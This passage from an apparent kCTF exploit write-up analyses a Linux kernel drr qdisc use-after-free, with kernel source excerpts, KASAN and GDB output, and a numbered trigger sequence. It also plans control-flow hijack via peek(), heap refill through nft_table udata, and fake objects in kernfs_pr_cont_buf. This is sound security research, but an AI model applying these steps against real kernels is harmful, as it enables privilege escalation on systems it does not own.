		<span class="n">cops</span> <span class="o">=</span> <span class="n">sch</span><span class="o">-&gt;</span><span class="n">ops</span><span class="o">-&gt;</span><span class="n">cl_ops</span><span class="p">;</span>				<span class="c1">// [2]</span>
		<span class="k">if</span> <span class="p">(</span><span class="n">notify</span> <span class="o">&amp;&amp;</span> <span class="n">cops</span><span class="o">-&gt;</span><span class="n">qlen_notify</span><span class="p">)</span> <span class="p">{</span>
			<span class="n">cl</span> <span class="o">=</span> <span class="n">cops</span><span class="o">-&gt;</span><span class="n">find</span><span class="p">(</span><span class="n">sch</span><span class="p">,</span> <span class="n">parentid</span><span class="p">);</span>			<span class="c1">// [3]</span>
			<span class="n">cops</span><span class="o">-&gt;</span><span class="n">qlen_notify</span><span class="p">(</span><span class="n">sch</span><span class="p">,</span> <span class="n">cl</span><span class="p">);</span>			<span class="c1">// [4]</span>
		<span class="p">}</span>
		<span class="n">sch</span><span class="o">-&gt;</span><span class="n">q</span><span class="p">.</span><span class="n">qlen</span> <span class="o">-=</span> <span class="n">n</span><span class="p">;</span>
		<span class="n">sch</span><span class="o">-&gt;</span><span class="n">qstats</span><span class="p">.</span><span class="n">backlog</span> <span class="o">-=</span> <span class="n">len</span><span class="p">;</span>
		<span class="n">__qdisc_qstats_drop</span><span class="p">(</span><span class="n">sch</span><span class="p">,</span> <span class="n">drops</span><span class="p">);</span>
	<span class="p">}</span>
	<span class="n">rcu_read_unlock</span><span class="p">();</span>
<span class="p">}</span>
</code></pre></div></div>

<ul>
  <li>
    <p><code class="language-plaintext highlighter-rouge">[1]</code>: We use the parentid that is derived from the qdisc. This is where the problem is, remember that one of the effects of the bug was that the qdisc itself doesn’t know that it was reparented to 1:3, its parentid is still going to reference class 3:1</p>
  </li>
  <li>
    <p><code class="language-plaintext highlighter-rouge">[2]</code>: Grab a reference to the function table for the qdisc’s class’s <code class="language-plaintext highlighter-rouge">ops</code> member so that we do a class appropriate search, ie <code class="language-plaintext highlighter-rouge">drr</code></p>
  </li>
  <li>
    <p><code class="language-plaintext highlighter-rouge">[3]</code>: Use the class ops to execute the <code class="language-plaintext highlighter-rouge">find</code> function <code class="language-plaintext highlighter-rouge">drr_search_class</code></p>
  </li>
  <li>
    <p><code class="language-plaintext highlighter-rouge">[4]</code>: We set <code class="language-plaintext highlighter-rouge">cl</code> to class 3:1 because according to the buggy qdisc, that is its class parent still</p>
  </li>
  <li>
    <p><code class="language-plaintext highlighter-rouge">[5]</code>: We call the class ops <code class="language-plaintext highlighter-rouge">qlen_notify</code> function, which for <code class="language-plaintext highlighter-rouge">drr</code> is <code class="language-plaintext highlighter-rouge">drr_qlen_notify</code></p>
  </li>
</ul>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">static</span> <span class="kt">void</span> <span class="nf">drr_qlen_notify</span><span class="p">(</span><span class="k">struct</span> <span class="n">Qdisc</span> <span class="o">*</span><span class="n">csh</span><span class="p">,</span> <span class="kt">unsigned</span> <span class="kt">long</span> <span class="n">arg</span><span class="p">)</span>
<span class="p">{</span>
	<span class="k">struct</span> <span class="n">drr_class</span> <span class="o">*</span><span class="n">cl</span> <span class="o">=</span> <span class="p">(</span><span class="k">struct</span> <span class="n">drr_class</span> <span class="o">*</span><span class="p">)</span><span class="n">arg</span><span class="p">;</span>

	<span class="n">list_del</span><span class="p">(</span><span class="o">&amp;</span><span class="n">cl</span><span class="o">-&gt;</span><span class="n">alist</span><span class="p">);</span>
<span class="p">}</span>
</code></pre></div></div>

<p>And here is the problem! We call <code class="language-plaintext highlighter-rouge">list_del</code> on class 3:1’s <code class="language-plaintext highlighter-rouge">alist</code> member which is an uninitialized <code class="language-plaintext highlighter-rouge">list_head</code>. Its <code class="language-plaintext highlighter-rouge">list_head</code> is uninitialized (NULL) because it was never placed on the drr scheduler’s active list because when we enqueued packets into class 1:3, it was class 1:3’s <code class="language-plaintext highlighter-rouge">alist</code> that was initialized and inserted into the scheduler’s active class list. This explains why we get the splat.</p>

<p>That’s one mystery solved, but why does our PoC stop at deleting class 1:3 on a <code class="language-plaintext highlighter-rouge">list_del</code> bug and the patch mentions UAF and includes deleting class 1:1?</p>

<h2 id="shooting-myself-in-the-foot">Shooting Myself in the Foot</h2>
<p>At this point I was happy to have discovered why we were encountering the list bug, but still didn’t see how this bug was exploitable or could lead to UAF. I started to suspect that the PoC in the patch was just to prove there was in fact an issue and not directly expose a UAF exactly. This was a horrible assumption that led me very astray. For probably two days worth of effort, I read all of the code over and over looking for ways that I could get a UAF on the buggy qdisc object. I don’t know why I assumed that the UAF must be on the buggy qdisc, but the fact that it appeared to belong to two separate classes weighed heavy in my mind. The issue I kept coming back to was: the qdisc’s refcount is correct, it’s 2, so how could it be the UAF object? I tried to find ways that I could free the qdisc, but still retain a reference to it via class 1:3 or class 3:1 in hopes that that would be the way to access the UAF.</p>

<p>After a couple of days of trying lots of different strategies and thinking about it, I realized that there was no way to free the qdisc from this buggy condition. If you delete its real parent in 3:1 you have no way grab a handle to it again, because non-root qdiscs must have a classid. So you can’t even look up the qdisc without providing a classid. If you delete 1:3, it will remove a refcount from the qdisc, but now everything is normal, it has a refcount of 1 and belongs to class 3:1.</p>

<p>I was very frustrated at this part and decided to start over, maybe I missed something in the patch. I fixated on the fact that in the patch they specifically say “lets trigger the UAF” and the action includes deleting 1:1. To this point, I was never able to even delete 1:1 because I get stuck panicking on the list bug. After toying with the idea of first initializing 3:1’s <code class="language-plaintext highlighter-rouge">alist</code> appropriately and getting it added to the active list for the scheduler to bypass the list bug, I decided to just quickly make sure there was nothing wrong with my setup. Mind you, I’ve been working in this environment for 2-3 days at this point getting familiar with the bug, reading the code, debugging, brainstorming about ways to get a UAF on the qdisc, etc.</p>

<p>I revisited the list code we discussed above. There were those <code class="language-plaintext highlighter-rouge">CHECK_DATA_CORRUPTION</code> invocations in the <code class="language-plaintext highlighter-rouge">__list_del_entry_valid_or_report</code> function like this:</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="cp">#define CHECK_DATA_CORRUPTION(condition, addr, fmt, ...)		 \
	check_data_corruption(({					 \
		bool corruption = unlikely(condition);			 \
		if (corruption) {					 \
			if (addr)					 \
				mem_dump_obj(addr);			 \
			if (IS_ENABLED(CONFIG_BUG_ON_DATA_CORRUPTION)) { \
				pr_err(fmt, ##__VA_ARGS__);		 \
				BUG();					 \
			} else						 \
				WARN(1, fmt, ##__VA_ARGS__);		 \
		}							 \
		corruption;						 \
	}))
</span>
<span class="cp">#endif	</span><span class="cm">/* _LINUX_BUG_H */</span><span class="cp">
</span></code></pre></div></div>

<p>Welp, this is a pretty important discovery. It looks like if you have <code class="language-plaintext highlighter-rouge">CONFIG_BUG_ON_DATA_CORRUPTION</code> enabled, you will <code class="language-plaintext highlighter-rouge">BUG()</code> on an invalid list del operation and if you don’t have it enabled, you will simply receive a <code class="language-plaintext highlighter-rouge">WARN()</code>. I check my kernel config in my development environment and sure enough I have <code class="language-plaintext highlighter-rouge">CONFIG_BUG_ON_DATA_CORRUPTION=y</code>. Let’s check the kCTF kernel configuration: <code class="language-plaintext highlighter-rouge">CONFIG_BUG_ON_DATA_CORRUPTION is not set</code>. Yikes! This whole time I was stuck on the list delete operation, days, was because I had the wrong kernel configuration. I felt awful about this but going forward I’ll obviously make my environment more kCTF like from the beginning.</p>

<h2 id="finally-a-uaf-to-investigate">Finally a UAF to Investigate</h2>
<p>Once I had the right kernel configuration, I re-ran the PoC and behold:</p>
<div class="language-terminal highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="go">[   26.091921] ==================================================================
[   26.093519] BUG: KASAN: slab-use-after-free in __list_del_entry_valid+0x7a/0x140
[   26.095252] Read of size 8 at addr ffff8880134c0558 by task tc.bin/816
[   26.096631] 
</span><span class="gp">[   26.097090] CPU: 0 PID: 816 Comm: tc.bin Tainted: G        W          6.5.13 #</span>92
<span class="go">[   26.098817] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.13.0-1ubuntu1.1 04/01/2014
[   26.100720] Call Trace:
</span><span class="gp">[   26.101297]  &lt;TASK&gt;</span><span class="w">
</span><span class="go">[   26.101771]  dump_stack_lvl+0x48/0x60
[   26.102612]  print_report+0xc2/0x600
[   26.103384]  ? __virt_addr_valid+0xc7/0x140
[   26.104294]  ? __list_del_entry_valid+0x7a/0x140
[   26.105306]  kasan_report+0xb6/0xf0
[   26.106059]  ? __list_del_entry_valid+0x7a/0x140
[   26.107056]  __list_del_entry_valid+0x7a/0x140
[   26.108001]  drr_qlen_notify+0x60/0xd0
[   26.108812]  qdisc_tree_reduce_backlog+0xf6/0x1f0
[   26.109827]  drr_delete_class+0x16e/0x2a0
</span></code></pre></div></div>

<p>We finally have a UAF and it happens when you go to delete class 1:1. So the PoC was entirely correct the whole time, and it was my bad kernel config and my assumptions about what must be happening (an impossible UAF on the qdisc) that led me astray for so long. As you can see from the backtrace, we know this code path well. This is the exact code path that leads to the initial list del bug we encountered when we were deleting class 1:3.</p>

<p>So now everything clicked for me. When we delete class 1:1 it is trying to unlink its <code class="language-plaintext highlighter-rouge">alist</code> <code class="language-plaintext highlighter-rouge">list_head</code> from the drr scheduler’s <code class="language-plaintext highlighter-rouge">active</code> list and when it does its <code class="language-plaintext highlighter-rouge">list_del</code> sanity checks, it’s accessing the freed 1:3 class’s <code class="language-plaintext highlighter-rouge">list_head</code> that remains in the <code class="language-plaintext highlighter-rouge">active</code> list even though we destroyed class 1:3. This is because we never removed it from the active list, the <code class="language-plaintext highlighter-rouge">list_del</code> we attempted tried to unlink class 3:1’s <code class="language-plaintext highlighter-rouge">list_head</code> instead. So this is where the UAF access comes from.</p>

<p>So now can we reason about how to exploit the UAF. From here, I created a similar PoC in my exploit just to make sure I had the right constituent parts but was able to reduce the complexity a bit because in hindsight, the bug is quite simple once you understand all of the moving parts. There are aspects of my exploit setup that are not strictly required, but keeping it relatively close to the PoC helped me initially and then I just left the code in there.</p>

<p>Here are the steps I followed to trigger the bug:</p>
<ol>
  <li>Create a root qdisc for the loopback interface that is of type drr</li>
  <li>Create class 1:1 of type drr</li>
  <li>Create class 1:3 of type drr</li>
  <li>Assign a plug qdisc to class 1:1</li>
  <li>Assign a pfifo (default type) qdisc to 1:3, this will be our reparented buggy qdisc later</li>
  <li>Create class 1:2 of type drr and reparent 1:3’s qdisc to 1:2, triggering the bug</li>
  <li>Enqueue packets in 1:1 and 1:2, this will place 1:1 and 1:2 class <code class="language-plaintext highlighter-rouge">alist</code> <code class="language-plaintext highlighter-rouge">list_head</code> nodes in the scheduler’s active list</li>
  <li>Delete class 1:1, I do this first because it will require sane <code class="language-plaintext highlighter-rouge">list_head</code> values for class 1:2 when it removes itself from the active list</li>
  <li>Delete class 1:2, this will fail to remove 1:2’s <code class="language-plaintext highlighter-rouge">list_head</code> from the active list but will free the class</li>
  <li>?? Profit</li>
</ol>

<p>So now we have to find out how the active list is used so that we can see how we can access our freed class that has a reference cached in the active list. A quick grep for <code class="language-plaintext highlighter-rouge">active</code> in <code class="language-plaintext highlighter-rouge">sch_drr.c</code> will lead you to <code class="language-plaintext highlighter-rouge">drr_dequeue</code>:</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">static</span> <span class="k">struct</span> <span class="n">sk_buff</span> <span class="o">*</span><span class="nf">drr_dequeue</span><span class="p">(</span><span class="k">struct</span> <span class="n">Qdisc</span> <span class="o">*</span><span class="n">sch</span><span class="p">)</span>
<span class="p">{</span>
	<span class="k">struct</span> <span class="n">drr_sched</span> <span class="o">*</span><span class="n">q</span> <span class="o">=</span> <span class="n">qdisc_priv</span><span class="p">(</span><span class="n">sch</span><span class="p">);</span>
	<span class="k">struct</span> <span class="n">drr_class</span> <span class="o">*</span><span class="n">cl</span><span class="p">;</span>
	<span class="k">struct</span> <span class="n">sk_buff</span> <span class="o">*</span><span class="n">skb</span><span class="p">;</span>
	<span class="kt">unsigned</span> <span class="kt">int</span> <span class="n">len</span><span class="p">;</span>

	<span class="k">if</span> <span class="p">(</span><span class="n">list_empty</span><span class="p">(</span><span class="o">&amp;</span><span class="n">q</span><span class="o">-&gt;</span><span class="n">active</span><span class="p">))</span>	<span class="c1">// [1]</span>
		<span class="k">goto</span> <span class="n">out</span><span class="p">;</span>
	<span class="k">while</span> <span class="p">(</span><span class="mi">1</span><span class="p">)</span> <span class="p">{</span>
		<span class="n">cl</span> <span class="o">=</span> <span class="n">list_first_entry</span><span class="p">(</span><span class="o">&amp;</span><span class="n">q</span><span class="o">-&gt;</span><span class="n">active</span><span class="p">,</span> <span class="k">struct</span> <span class="n">drr_class</span><span class="p">,</span> <span class="n">alist</span><span class="p">);</span> <span class="c1">// [2]</span>
		<span class="n">skb</span> <span class="o">=</span> <span class="n">cl</span><span class="o">-&gt;</span><span class="n">qdisc</span><span class="o">-&gt;</span><span class="n">ops</span><span class="o">-&gt;</span><span class="n">peek</span><span class="p">(</span><span class="n">cl</span><span class="o">-&gt;</span><span class="n">qdisc</span><span class="p">);</span> <span class="c1">// [3]</span>
		<span class="k">if</span> <span class="p">(</span><span class="n">skb</span> <span class="o">==</span> <span class="nb">NULL</span><span class="p">)</span> <span class="p">{</span>
			<span class="n">qdisc_warn_nonwc</span><span class="p">(</span><span class="n">__func__</span><span class="p">,</span> <span class="n">cl</span><span class="o">-&gt;</span><span class="n">qdisc</span><span class="p">);</span>
			<span class="k">goto</span> <span class="n">out</span><span class="p">;</span>
		<span class="p">}</span>

		<span class="n">len</span> <span class="o">=</span> <span class="n">qdisc_pkt_len</span><span class="p">(</span><span class="n">skb</span><span class="p">);</span>
		<span class="k">if</span> <span class="p">(</span><span class="n">len</span> <span class="o">&lt;=</span> <span class="n">cl</span><span class="o">-&gt;</span><span class="n">deficit</span><span class="p">)</span> <span class="p">{</span>
			<span class="n">cl</span><span class="o">-&gt;</span><span class="n">deficit</span> <span class="o">-=</span> <span class="n">len</span><span class="p">;</span>
			<span class="n">skb</span> <span class="o">=</span> <span class="n">qdisc_dequeue_peeked</span><span class="p">(</span><span class="n">cl</span><span class="o">-&gt;</span><span class="n">qdisc</span><span class="p">);</span>
			<span class="k">if</span> <span class="p">(</span><span class="n">unlikely</span><span class="p">(</span><span class="n">skb</span> <span class="o">==</span> <span class="nb">NULL</span><span class="p">))</span>
				<span class="k">goto</span> <span class="n">out</span><span class="p">;</span>
			<span class="k">if</span> <span class="p">(</span><span class="n">cl</span><span class="o">-&gt;</span><span class="n">qdisc</span><span class="o">-&gt;</span><span class="n">q</span><span class="p">.</span><span class="n">qlen</span> <span class="o">==</span> <span class="mi">0</span><span class="p">)</span>
				<span class="n">list_del</span><span class="p">(</span><span class="o">&amp;</span><span class="n">cl</span><span class="o">-&gt;</span><span class="n">alist</span><span class="p">);</span>

			<span class="n">bstats_update</span><span class="p">(</span><span class="o">&amp;</span><span class="n">cl</span><span class="o">-&gt;</span><span class="n">bstats</span><span class="p">,</span> <span class="n">skb</span><span class="p">);</span>
			<span class="n">qdisc_bstats_update</span><span class="p">(</span><span class="n">sch</span><span class="p">,</span> <span class="n">skb</span><span class="p">);</span>
			<span class="n">qdisc_qstats_backlog_dec</span><span class="p">(</span><span class="n">sch</span><span class="p">,</span> <span class="n">skb</span><span class="p">);</span>
			<span class="n">sch</span><span class="o">-&gt;</span><span class="n">q</span><span class="p">.</span><span class="n">qlen</span><span class="o">--</span><span class="p">;</span>
			<span class="k">return</span> <span class="n">skb</span><span class="p">;</span>
		<span class="p">}</span>

		<span class="n">cl</span><span class="o">-&gt;</span><span class="n">deficit</span> <span class="o">+=</span> <span class="n">cl</span><span class="o">-&gt;</span><span class="n">quantum</span><span class="p">;</span>
		<span class="n">list_move_tail</span><span class="p">(</span><span class="o">&amp;</span><span class="n">cl</span><span class="o">-&gt;</span><span class="n">alist</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">q</span><span class="o">-&gt;</span><span class="n">active</span><span class="p">);</span>
	<span class="p">}</span>
<span class="nl">out:</span>
	<span class="k">return</span> <span class="nb">NULL</span><span class="p">;</span>
<span class="p">}</span>
</code></pre></div></div>

<ul>
  <li>
    <p><code class="language-plaintext highlighter-rouge">[1]</code>: This function gets invoked whenever a packet is received on the root drr qdisc’s interface and the way the drr algorithm works is it looks through its active packet flows and tries to dequeue packets based on the requirements of each active class. It first checks to make sure there are actually active classes on the scheduler’s active list. Our buggy class is on the active list thankfully because of class 1:1 making sure that no packets are dequeued by virtue of its plug qdisc. So tip of the cap to the patch author and Lion Ackermann, thank you!</p>
  </li>
  <li>
    <p><code class="language-plaintext highlighter-rouge">[2]</code>: In a while loop, we first get a handle to the first <code class="language-plaintext highlighter-rouge">struct drr_class</code> on the active list. Since we deleted class 1:1 who had packets enqueued in its plug qdisc first, this first class should be our UAF class</p>
  </li>
  <li>
    <p><code class="language-plaintext highlighter-rouge">[3]</code>: This is is what caught my eye, since we have a UAF on <code class="language-plaintext highlighter-rouge">cl</code>, we potentially can hijack RIP here since we can possibly control the entirety of <code class="language-plaintext highlighter-rouge">cl-&gt;qdisc-&gt;ops-&gt;peek()</code> and replace <code class="language-plaintext highlighter-rouge">peek()</code> with a function of our choice</p>
  </li>
</ul>

<p>Now it was time to develop an exploit plan.</p>

<h2 id="exploit-plan">Exploit Plan</h2>
<p>Seeing that we invoke <code class="language-plaintext highlighter-rouge">cl-&gt;qdisc-&gt;ops-&gt;peek()</code>, I was confident that I could hijack execution. This turned out to be entirely true, at this point I told some friends that all I had to do was some ROP and I’d be on my way to capturing the flag. This turned out to be entirely false and completing the exploit was a lot more difficult than I anticipated. The main issue I had trying to ROP was that I couldn’t find a stack-pivot gadget that worked with our register control at the time that we hijack execution in order for us to start ROP’ing:</p>
<div class="language-terminal highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="gp">$</span>rax   : 0xffffffff81356310					// <span class="o">[</span>1]
<span class="gp">$</span>rbx   : 0xffff88800f295bd0					// <span class="o">[</span>2]
<span class="gp">$</span>rcx   : 0x20000           
<span class="gp">$</span>rdx   : 0x0               
<span class="gp">$</span>rsp   : 0xffffc9000188baf0
<span class="gp">$</span>rbp   : 0xffff888006d19e00
<span class="gp">$</span>rsi   : 0x0               
<span class="gp">$</span>rdi   : 0xffffffff84267b88					// <span class="o">[</span>3]
<span class="gp">$</span>rip   : 0xffffffff81d71bd8
<span class="gp">$</span>r8    : 0x1               
<span class="gp">$</span>r9    : 0xffffc9000188bb90
<span class="gp">$</span>r10   : 0xffff88800f2719e0
<span class="gp">$</span>r11   : 0xffff888006b6a660
<span class="gp">$</span>r12   : 0xffff888006d19f40
<span class="gp">$</span>r13   : 0x0               
<span class="gp">$</span>r14   : 0xffff888006d19e00
<span class="gp">$</span>r15   : 0xffff888006d19e00
<span class="gp">$</span>eflags: <span class="o">[</span>zero CARRY parity adjust SIGN <span class="nb">trap </span>INTERRUPT direction overflow resume virtualx86 identification]
<span class="gp">$</span>cs: 0x10 <span class="nv">$ss</span>: 0x18 <span class="nv">$ds</span>: 0x00 <span class="nv">$es</span>: 0x00 <span class="nv">$fs</span>: 0x00 <span class="nv">$gs</span>: 0x00 
<span class="go">───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── code:x86:64 ────
</span><span class="gp">   0xffffffff81d71bcc &lt;drr_dequeue+44&gt;</span><span class="w"> </span>mov    rdi, QWORD PTR <span class="o">[</span>rbx+0x10]
<span class="gp">   0xffffffff81d71bd0 &lt;drr_dequeue+48&gt;</span><span class="w"> </span>mov    rax, QWORD PTR <span class="o">[</span>rdi+0x18]
<span class="gp">   0xffffffff81d71bd4 &lt;drr_dequeue+52&gt;</span><span class="w"> </span>mov    rax, QWORD PTR <span class="o">[</span>rax+0x38]
<span class="gp"> → 0xffffffff81d71bd8 &lt;drr_dequeue+56&gt;</span><span class="w"> </span>call   rax
</code></pre></div></div>

<p>Here I’m showing you the GDB output when we we’re about to <code class="language-plaintext highlighter-rouge">call rax</code> which is when we call the <code class="language-plaintext highlighter-rouge">peek</code> that we hijack. We have the following register control:</p>
<ul>
  <li>
    <p><code class="language-plaintext highlighter-rouge">[1]</code>: <code class="language-plaintext highlighter-rouge">rax</code> ends up being the function address we want to call, so any ROP stack pivot that utilizes <code class="language-plaintext highlighter-rouge">rax</code> would be self-referential in a way that made it difficult to find an appropriate gadget</p>
  </li>
  <li>
    <p><code class="language-plaintext highlighter-rouge">[2]</code>: <code class="language-plaintext highlighter-rouge">rbx</code> ends up being an address inside our UAF class. This is great for us as this could represent a way to stack-pivot since we control the contents around this address; however, I was unable to find any stack pivot gadgets that help us here</p>
  </li>
  <li>
    <p><code class="language-plaintext highlighter-rouge">[3]</code>: <code class="language-plaintext highlighter-rouge">rdi</code> ends up being the address of the UAF class’s qdisc. Again, this would great for us because we control this memory but I was unable to find an appropriate stack pivot gadget</p>
  </li>
</ul>

<p>To be quite honest, I didn’t spend too much time trying to make ROP work, there were perhaps gadgets or strategies that I didn’t think of or consider that would’ve enabled me to use ROP but I gave up pretty quickly, probably a couple hours or so of looking. I figured with our precise control over <code class="language-plaintext highlighter-rouge">rdi</code> and the fact that we have what amounts to an arbitrary function call primitive, I felt like there <em>had</em> to be gadgets (single function calls) we could leverage to capture the flag.</p>

<p>First thing is first, I knew from other entries and players that I didn’t really have to worry about KASLR as a barrier, because I could always just use the <a href="https://www.willsroot.io/2022/12/entrybleed.html">Entrybleed</a> side-channel, so I didn’t invest any time in trying to think of other ways to defeat KASLR. There was also the possibility that we use the <code class="language-plaintext highlighter-rouge">WARN()</code> splat from the invalid <code class="language-plaintext highlighter-rouge">list_del</code> which ends up showing us register values containing heap pointers, our PID (on COS instances we spawn inside a namespace jail and we don’t know our real pid), and a kernel text pointer that could be used to defeat KASLR. I thought this was sort of inelegant but never crossed it off my list of possibilities. Luckily I was able to complete the exploit without resorting to this.</p>

<p>With that settled, I moved onto what we should do to refill the freed class so that we could control what function is called. I identified the <a href="https://elixir.bootlin.com/linux/v5.15.173/source/include/net/netfilter/nf_tables.h#L1178"><code class="language-plaintext highlighter-rouge">nft_table-&gt;udata</code></a> field as a nice elastic object that is 100% user-controlled back in around 2023 that could be used as a refill object for kmalloc slab caches up to kmalloc-256, but never got the chance to use it. Kernel devs eventually turned this allocation into a <code class="language-plaintext highlighter-rouge">GFP_KERNEL_ACCOUNT</code> allocation, so it can’t be used any more if the slab caches are separate to replace general kmalloc-128 objects like our class. But on the Google COS instance which runs a 5.15.173+ kernel, the allocation was non-accounted so I decided to use it.</p>

<p>With this refill object, we can now fake 100% of the UAF class, which is obviously helpful. The problem is that due to the multiple pointer dereferences in the indirect call to <code class="language-plaintext highlighter-rouge">cl-&gt;qdisc-&gt;ops-&gt;peek</code>, we also need to control data at a <em>known</em> location from the kernel base. I first looked for an opportunity to use <a href="https://dl.acm.org/doi/10.1145/3576915.3623220">RetSpill</a> to smuggle user controlled values into my kernel stack, but we end up in our gadget via a <code class="language-plaintext highlighter-rouge">sendto</code> syscall which unfortunately doesn’t happen to spill any user values onto the kernel stack, at least from what I could tell. Next I settled on using the <a href="https://elixir.bootlin.com/linux/v5.15.173/source/fs/kernfs/dir.c#L30"><code class="language-plaintext highlighter-rouge">kernfs_pr_cont_buf</code></a>, which I learned about in the kCTF Discord from <a href="https://x.com/roddux">@roddux</a>. They had read this <a href="https://github.com/zerozenxlabs/ZDI-24-020">writeup</a> which contained the details. Basically, if your kernel has <code class="language-plaintext highlighter-rouge">CONFIG_NETFILTER_XT_MATCH_CGROUP</code>, which kCTF instances do, then you can store up to <code class="language-plaintext highlighter-rouge">PATH_MAX</code> user controlled data a known offset from the kernel base. This is insane actually and makes exploitation so much easier. The best part is the data there is very mutable, you can just keep resetting its contents. You can accomplish this by establishing an <code class="language-plaintext highlighter-rouge">iptables</code> match rule on a cgroup file path, and the file path gets stored as data in the buffer. The only <em>catch</em> is that the buffer is meant to store a path name, thus, any NULL could terminate your data buffer. So this is something I had to account for in my exploit.</p>

<p>Now we seemingly had everything we needed to explore what function to call. We had our fake class which was in <code class="language-plaintext highlighter-rouge">nft_table-&gt;udata</code> and our fake qdisc and its ops table at a known address in <code class="language-plaintext highlighter-rouge">kernfs_pr_cont_buf</code>. The next thing I wanted to accomplish at this point was to determine what side-effects hijacking execution here brought with it. So I used our function call primitive to just call a <code class="language-plaintext highlighter-rouge">ret</code> gadget, and see where we end up. We immediately blow up in <code class="language-plaintext highlighter-rouge">drr_dequeue</code> for a few reasons:</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">static</span> <span class="k">struct</span> <span class="n">sk_buff</span> <span class="o">*</span><span class="nf">drr_dequeue</span><span class="p">(</span><span class="k">struct</span> <span class="n">Qdisc</span> <span class="o">*</span><span class="n">sch</span><span class="p">)</span>
<span class="p">{</span>
	<span class="k">struct</span> <span class="n">drr_sched</span> <span class="o">*</span><span class="n">q</span> <span class="o">=</span> <span class="n">qdisc_priv</span><span class="p">(</span><span class="n">sch</span><span class="p">);</span>
	<span class="k">struct</span> <span class="n">drr_class</span> <span class="o">*</span><span class="n">cl</span><span class="p">;</span>
	<span class="k">struct</span> <span class="n">sk_buff</span> <span class="o">*</span><span class="n">skb</span><span class="p">;</span>
	<span class="kt">unsigned</span> <span class="kt">int</span> <span class="n">len</span><span class="p">;</span>

	<span class="k">if</span> <span class="p">(</span><span class="n">list_empty</span><span class="p">(</span><span class="o">&amp;</span><span class="n">q</span><span class="o">-&gt;</span><span class="n">active</span><span class="p">))</span>
		<span class="k">goto</span> <span class="n">out</span><span class="p">;</span>
	<span class="k">while</span> <span class="p">(</span><span class="mi">1</span><span class="p">)</span> <span class="p">{</span>
		<span class="n">cl</span> <span class="o">=</span> <span class="n">list_first_entry</span><span class="p">(</span><span class="o">&amp;</span><span class="n">q</span><span class="o">-&gt;</span><span class="n">active</span><span class="p">,</span> <span class="k">struct</span> <span class="n">drr_class</span><span class="p">,</span> <span class="n">alist</span><span class="p">);</span>
		<span class="n">skb</span> <span class="o">=</span> <span class="n">cl</span><span class="o">-&gt;</span><span class="n">qdisc</span><span class="o">-&gt;</span><span class="n">ops</span><span class="o">-&gt;</span><span class="n">peek</span><span class="p">(</span><span class="n">cl</span><span class="o">-&gt;</span><span class="n">qdisc</span><span class="p">);</span>				<span class="c1">// [1]</span>
		<span class="k">if</span> <span class="p">(</span><span class="n">skb</span> <span class="o">==</span> <span class="nb">NULL</span><span class="p">)</span> <span class="p">{</span>
			<span class="n">qdisc_warn_nonwc</span><span class="p">(</span><span class="n">__func__</span><span class="p">,</span> <span class="n">cl</span><span class="o">-&gt;</span><span class="n">qdisc</span><span class="p">);</span>
			<span class="k">goto</span> <span class="n">out</span><span class="p">;</span>
		<span class="p">}</span>

		<span class="n">len</span> <span class="o">=</span> <span class="n">qdisc_pkt_len</span><span class="p">(</span><span class="n">skb</span><span class="p">);</span>					<span class="c1">// [2]</span>
		<span class="k">if</span> <span class="p">(</span><span class="n">len</span> <span class="o">&lt;=</span> <span class="n">cl</span><span class="o">-&gt;</span><span class="n">deficit</span><span class="p">)</span> <span class="p">{</span>					<span class="c1">// [3]</span>
			<span class="n">cl</span><span class="o">-&gt;</span><span class="n">deficit</span> <span class="o">-=</span> <span class="n">len</span><span class="p">;</span>					<span class="c1">// [4]</span>
			<span class="n">skb</span> <span class="o">=</span> <span class="n">qdisc_dequeue_peeked</span><span class="p">(</span><span class="n">cl</span><span class="o">-&gt;</span><span class="n">qdisc</span><span class="p">);</span>			<span class="c1">// [5]</span>
			<span class="k">if</span> <span class="p">(</span><span class="n">unlikely</span><span class="p">(</span><span class="n">skb</span> <span class="o">==</span> <span class="nb">NULL</span><span class="p">))</span>
				<span class="k">goto</span> <span class="n">out</span><span class="p">;</span>					<span class="c1">// [6]</span>
			<span class="k">if</span> <span class="p">(</span><span class="n">cl</span><span class="o">-&gt;</span><span class="n">qdisc</span><span class="o">-&gt;</span><span class="n">q</span><span class="p">.</span><span class="n">qlen</span> <span class="o">==</span> <span class="mi">0</span><span class="p">)</span>
				<span class="n">list_del</span><span class="p">(</span><span class="o">&amp;</span><span class="n">cl</span><span class="o">-&gt;</span><span class="n">alist</span><span class="p">);</span>

			<span class="n">bstats_update</span><span class="p">(</span><span class="o">&amp;</span><span class="n">cl</span><span class="o">-&gt;</span><span class="n">bstats</span><span class="p">,</span> <span class="n">skb</span><span class="p">);</span>
			<span class="n">qdisc_bstats_update</span><span class="p">(</span><span class="n">sch</span><span class="p">,</span> <span class="n">skb</span><span class="p">);</span>
			<span class="n">qdisc_qstats_backlog_dec</span><span class="p">(</span><span class="n">sch</span><span class="p">,</span> <span class="n">skb</span><span class="p">);</span>
			<span class="n">sch</span><span class="o">-&gt;</span><span class="n">q</span><span class="p">.</span><span class="n">qlen</span><span class="o">--</span><span class="p">;</span>
			<span class="k">return</span> <span class="n">skb</span><span class="p">;</span>						<span class="c1">// [7]</span>
		<span class="p">}</span>

		<span class="n">cl</span><span class="o">-&gt;</span><span class="n">deficit</span> <span class="o">+=</span> <span class="n">cl</span><span class="o">-&gt;</span><span class="n">quantum</span><span class="p">;</span>
		<span class="n">list_move_tail</span><span class="p">(</span><span class="o">&amp;</span><span class="n">cl</span><span class="o">-&gt;</span><span class="n">alist</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">q</span><span class="o">-&gt;</span><span class="n">active</span><span class="p">);</span>				<span class="c1">// [8]</span>
	<span class="p">}</span>
<span class="nl">out:</span>
	<span class="k">return</span> <span class="nb">NULL</span><span class="p">;</span>
<span class="p">}</span>
</code></pre></div></div>

